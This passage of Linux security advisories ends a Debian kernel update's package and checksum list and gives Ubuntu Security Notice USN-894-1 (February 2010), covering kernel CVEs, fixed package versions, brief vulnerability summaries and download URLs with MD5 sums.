http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 218314 4174dec1c73ca114469cbb88fba32926

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 16567710 29d2ab68b4259a1822a2ca19e9494f5d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 309868 d69b27ef946f2ac62b115e0200fe8002 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 26988356 f0d885b353b15dc42e4e76da8a8fb129 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 248150 7c585f74e0752a631050b13b9740c0c3 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 13318088 0b0a8b724245ac10817b03c4cf734827 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 83484 a678208f18017a9c87d45548916fd98e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 311392 5b1f0957a2756b04be6c95ae8ca5e2c8 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 21736368 02da1a4e543b8c5082476b156281cb31 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 247968 929ca712a0aa0984f9dc2a6f68f405a5 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 16632240 c9de1dfccb8a5cb5d5d652ca694a7108 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 3805532 be10a8b64da3adf7ece3846b0b0bf930 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 83434 ac0cb9b5939e4ea82c3c83a1a1d473ed http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 248174 50e84058a7d710f013f92e1fe68a705c

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 322474 2d7e39cf0b78d98125a0baba377f1af0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 19195556 bb2bd8e203cee7b3c6739d5c5d11901a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 324008 3b021bb4b3dac72dc68e701f4a209939 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 295928 ca2bf1c3c12f409e469c516877a8e91c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 21170062 4022dbff73ebfde3a846ce38896cf09c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 322502 4b76cce255e1fcc72cb82053cd34a1a2 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 17459240 ad749c6e735e58d775b7190ff3d26e50 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 83466 a041c0fdb383832cf725723ce22e40c0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 83430 392d415932625b1a69dc6494d2f737e0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 3674486 200fdcca2140a97f961a37d70db620d5 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 19487244 b42ad8431643d89a1f8b0e6e0aaeb39e

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 83532 a1c34683fe304f1a86bbc28f6cbc654c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 83556 bf7fed1ef4da92d782409fe8345f861a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 6976486 5b5db16fea4336068bbcd5bff56ad575 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 7228452 75c044fa17d6071de36579a1491c2e1b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 3431908 18825f85900faca81b21e48d43af6ee7 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 197006 0a44248e77ec1ff027edd032ebe5b2c6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 1503494 bd7f7b7bd4e120472bf60ad0b7d9184e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 196810 f03114c2f256a97b15f88d2659f9501b

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 83428 1ea7179752fbb45e10e731991583db68 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 263546 ef894d6917cbe692ec9197048538d5e7 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 3651402 a0194c650712040f81e97d5b3b62bc79 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 264892 0b642e20f00b52c20b6ae9e0ee1f78b8 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 83442 6d109d7f131dab564736e2ac6a85dd29 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 13318532 dbce062bfa560c331b75bed073868e1d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 13019464 b0b153fafa43b650e996a9d84bbb26d7

These changes will probably be included in the oldstable distribution on its next update. =========================================================== Ubuntu Security Notice USN-894-1 February 05, 2010 linux, linux-source-2.6.15 vulnerabilities CVE-2009-4020, CVE-2009-4021, CVE-2009-4031, CVE-2009-4138, CVE-2009-4141, CVE-2009-4308, CVE-2009-4536, CVE-2009-4538, CVE-2010-0003, CVE-2010-0006, CVE-2010-0007, CVE-2010-0291 ===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 Ubuntu 9.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS: linux-image-2.6.15-55-386 2.6.15-55.82 linux-image-2.6.15-55-686 2.6.15-55.82 linux-image-2.6.15-55-amd64-generic 2.6.15-55.82 linux-image-2.6.15-55-amd64-k8 2.6.15-55.82 linux-image-2.6.15-55-amd64-server 2.6.15-55.82 linux-image-2.6.15-55-amd64-xeon 2.6.15-55.82 linux-image-2.6.15-55-hppa32 2.6.15-55.82 linux-image-2.6.15-55-hppa32-smp 2.6.15-55.82 linux-image-2.6.15-55-hppa64 2.6.15-55.82 linux-image-2.6.15-55-hppa64-smp 2.6.15-55.82 linux-image-2.6.15-55-itanium 2.6.15-55.82 linux-image-2.6.15-55-itanium-smp 2.6.15-55.82 linux-image-2.6.15-55-k7 2.6.15-55.82 linux-image-2.6.15-55-mckinley 2.6.15-55.82 linux-image-2.6.15-55-mckinley-smp 2.6.15-55.82 linux-image-2.6.15-55-powerpc 2.6.15-55.82 linux-image-2.6.15-55-powerpc-smp 2.6.15-55.82 linux-image-2.6.15-55-powerpc64-smp 2.6.15-55.82 linux-image-2.6.15-55-server 2.6.15-55.82 linux-image-2.6.15-55-server-bigiron 2.6.15-55.82 linux-image-2.6.15-55-sparc64 2.6.15-55.82 linux-image-2.6.15-55-sparc64-smp 2.6.15-55.82

Ubuntu 8.04 LTS: linux-image-2.6.24-27-386 2.6.24-27.65 linux-image-2.6.24-27-generic 2.6.24-27.65 linux-image-2.6.24-27-hppa32 2.6.24-27.65 linux-image-2.6.24-27-hppa64 2.6.24-27.65 linux-image-2.6.24-27-itanium 2.6.24-27.65 linux-image-2.6.24-27-lpia 2.6.24-27.65 linux-image-2.6.24-27-lpiacompat 2.6.24-27.65 linux-image-2.6.24-27-mckinley 2.6.24-27.65 linux-image-2.6.24-27-openvz 2.6.24-27.65 linux-image-2.6.24-27-powerpc 2.6.24-27.65 linux-image-2.6.24-27-powerpc-smp 2.6.24-27.65 linux-image-2.6.24-27-powerpc64-smp 2.6.24-27.65 linux-image-2.6.24-27-rt 2.6.24-27.65 linux-image-2.6.24-27-server 2.6.24-27.65 linux-image-2.6.24-27-sparc64 2.6.24-27.65 linux-image-2.6.24-27-sparc64-smp 2.6.24-27.65 linux-image-2.6.24-27-virtual 2.6.24-27.65 linux-image-2.6.24-27-xen 2.6.24-27.65

Ubuntu 8.10: linux-image-2.6.27-17-generic 2.6.27-17.45 linux-image-2.6.27-17-server 2.6.27-17.45 linux-image-2.6.27-17-virtual 2.6.27-17.45

Ubuntu 9.04: linux-image-2.6.28-18-generic 2.6.28-18.59 linux-image-2.6.28-18-imx51 2.6.28-18.59 linux-image-2.6.28-18-iop32x 2.6.28-18.59 linux-image-2.6.28-18-ixp4xx 2.6.28-18.59 linux-image-2.6.28-18-lpia 2.6.28-18.59 linux-image-2.6.28-18-server 2.6.28-18.59 linux-image-2.6.28-18-versatile 2.6.28-18.59 linux-image-2.6.28-18-virtual 2.6.28-18.59

Ubuntu 9.10: kernel-image-2.6.31-108-imx51-di 2.6.31-108.21 linux-image-2.6.31-19-386 2.6.31-19.56 linux-image-2.6.31-19-generic 2.6.31-19.56 linux-image-2.6.31-19-generic-pae 2.6.31-19.56 linux-image-2.6.31-19-ia64 2.6.31-19.56 linux-image-2.6.31-19-lpia 2.6.31-19.56 linux-image-2.6.31-19-powerpc 2.6.31-19.56 linux-image-2.6.31-19-powerpc-smp 2.6.31-19.56 linux-image-2.6.31-19-powerpc64-smp 2.6.31-19.56 linux-image-2.6.31-19-server 2.6.31-19.56 linux-image-2.6.31-19-sparc64 2.6.31-19.56 linux-image-2.6.31-19-sparc64-smp 2.6.31-19.56 linux-image-2.6.31-19-virtual 2.6.31-19.56 linux-image-2.6.31-211-dove 2.6.31-211.22 linux-image-2.6.31-211-dove-z0 2.6.31-211.22 linux-image-2.6.31-304-ec2 2.6.31-304.10

After a standard system upgrade you need to reboot your computer to effect the necessary changes.

ATTENTION: Due to an unavoidable ABI change (except for Ubuntu 6.06) the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well.

Details follow:

Amerigo Wang and Eric Sesterhenn discovered that the HFS and ext4 filesystems did not correctly check certain disk structures. (CVE-2009-4021)

It was discovered that KVM did not correctly decode certain guest instructions. A local attacker in a guest could exploit this to trigger high scheduling latency in the host, leading to a denial of service. (CVE-2009-4138)

Tavis Ormandy discovered that the kernel did not correctly handle O_ASYNC on locked files. (CVE-2009-4141)

Neil Horman and Eugene Teo discovered that the e1000 and e1000e network drivers did not correctly check the size of Ethernet frames. A local attacker could exploit this, leading to a loss of privacy. (CVE-2010-0003)

Olli Jarva and Tuomo Untinen discovered that IPv6 did not correctly handle jumbo frames. (CVE-2010-0291)

Updated packages for Ubuntu 6.06 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.diff.gz
  Size/MD5:  2928444 765d0254f54d27d447de8f0b39548848
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.dsc
  Size/MD5:     2921 682576890de917043eccf6fc9398aed2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz
  Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.82_all.deb
  Size/MD5:  5170062 ef1a9c95890c4ba600a3e5523d49bb59
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.82_all.deb
  Size/MD5:    96386 b184441d2f44037554d037d217688393
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82_all.deb
  Size/MD5: 44742098 b5215eb163e357a179dbf36169ae1fa2

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    22350 d8934981c2fdd09168a5e576cc1b809a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    44768 74be7582e8f82aeb48af59731ce128be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     2312 d464c76f98a4142add7a69aca1305739
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    36294 a65060e99feff7e2ecef38be6d92fbc3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   102366 04d59c868ce03dc83b69116b022735b8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    38892 e80a653bb000e86f38da594d4bc1742d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    49160 a512718368004f81e83063ea8972c871
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   176612 81ab4c185b3af1dea1a082283c1ec9b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    36776 fcb0833daefa645545a2451824094b21
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   142346 3e6446140bfad0b19c512c69377d8026
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    51060 a11ceed7ccb1b96c2a8b2e7f840061b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   140710 e1789bb9d7cdd542a862e8ef209de802
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   287606 f3cc835959f215c209dc5a825596849c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    97828 05627ddbba40a6517ae7f8ca75f195c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1652102 c9eea2df3fdde2a5e7d2f4dff99e6772
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb
  Size/MD5:   872314 6e8f80e117e13665c95fb75593853d49
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb
  Size/MD5:   872448 1a70a906bccd7642241535f79feddb57
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb
  Size/MD5:   874570 0da9cd27666b58b5328e18dbc01c9b2e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb
  Size/MD5:   872194 375aad441654cdcd2338c5809e6319ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_amd64.deb
  Size/MD5:  6926870 c5868857ae3e12da5ffd91ec60d75501
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb
  Size/MD5: 20817720 06e066129d82d4fa8e41a2a058dcb9f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb
  Size/MD5: 20798158 1e5bf064dc2aab9880b30448d06eba9d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb
  Size/MD5: 21635636 0bb9fd3f753b4dcedf70fa8f36c48467
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb
  Size/MD5: 19905244 a04e5f6463fe334c28598cbf13506043
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    15630 8d1da510f959f7b9a2d0aa73ab80ae39
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   240360 20cd65fa275cfe8a83743ddb5a95f528
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   202666 71d8be83541874d6c675945838b9e223
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1048610 9125e9e6c294bb450e37643b3ed7397e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1543634 ff7af4dcfc269a529f0adef3823a7244
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   161692 5623fa9ad6b280d0a5271917e89ca8ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     9832 bd5218587371f5b309ef2d1f77f98420
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    80870 20f034d6199d2902130f8bba12f48afe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    49294 e4a805200acaaea274e67995602294e6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    35158 0869bee234a54b1afe362123606efe66
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    70890 74ad81f0209c505c41d61c143b90f879
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     6218 ab28cdccb61315cac14d9046821e264d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     9060 6b179cd944eb7f83f03147e09025e6be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    57924 5465064d051dec863ad3f4f1a91553f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   123380 18eabdae11c2d77a1694f0cd467107a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   101078 efbe32714c0fed5aec8a70095af299df
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    79272 2fbe8585b11e0fa73fad8e94298082bf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1595398 3e11b94ed4701d1d84b6aeb303782d97
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    72352 e413c3057779de1b3c8f0c4d8d7fb577
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    12648 41487d8dc828d7f94a5c8ed495f06a99
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    33806 ebf707126fa6326899d648786afa8779
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   138512 ff1e0d4f0e9c5efc7bbae4d92194da5d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    38938 75eb074224a6373013e621cdd5931a51
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   278876 1586e5c6fc3fedf7f63f19c35a4fd9e8

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    18976 940a7c03cfe47e9d0543f49849c8765f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    43482 466c625f614e3624fa548bc5f96efa74
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   105216 d45ce18fb4d9c2cf5da6d14ae69a86c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     2284 de2293fa5c6e5493307a1913b606ad20
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    34572 4e302b4f7144fd504b2475a4103a3bf5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    97044 eeafb6c943244dd33659e7e7db9a9f76
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    37128 d4d67e516f236bf54a00697b71a3219b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    44122 1657e3520cbd2fbc832cf91bd6366a38
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   167738 7431ddaa7c8f0c9b6e583129cdc839f7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    33954 8251d509fb9bacd314f62cc90bda5b96
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   137972 9b8295fffc47ab4cf16ec34f7ef8b7aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    46892 c12096744faa1ca0735b62ea045b0c65
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   133162 5805bb2e2bfab6158d8d217b08079cc2
